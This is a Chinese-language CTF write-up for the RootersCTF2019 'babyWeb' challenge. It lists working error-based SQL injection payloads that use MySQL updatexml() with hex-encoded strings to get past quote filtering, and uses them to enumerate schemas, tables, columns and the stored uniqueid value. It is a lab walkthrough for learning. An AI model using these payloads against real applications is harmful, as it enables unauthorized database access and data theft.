[RootersCTF2019]babyWeb

分析
页面中告诉我们要找一串数字输进去,且过滤了一些关键词。

UNION被过滤了说明堆叠注入没法用了,并且他还把sql语句给我们了,那大概率是报错注入了,试下看看。

1
SELECT * FROM users WHERE uniqueid=1

果然是报错注入,这边的||功能和and一样,用and也一样。

果然是报错注入,这边的||功能和and一样,用and也一样。

接下来就慢慢构造呗,这边有一个小的知识点,题目虽然过滤了引号,但我们可以用16进制来达到同样的目的。
例如:

1
table_name='users' 和 table_name=0x7573657273 功能一样
1
2
3
4
5
6
7
8
9
10
11
爆库:sql_injection
1||(updatexml(1,concat(0x3a,(select SCHEMA_NAME from information_schema.schemata limit 3,1)),1))#

爆表:users
1||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

列字段:USER CURRENT_CONNECTIONS TOTAL_CONNECTIONS user uniqueid
1||(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name=0x7573657273 limit 4,1)),1))#

取值:
1||(updatexml(1,concat(0x3a,(select uniqueid from sql_injection.users limit 0,1)),1))#

flag
最后在sql_injection.users的uniqueid字段里找到一串数字

在这里插入图片描述

输入到主页的框里就可以拿到flag了。、

在这里插入图片描述

参考链接:https://blog.csdn.net/shinygod/article/details/126937168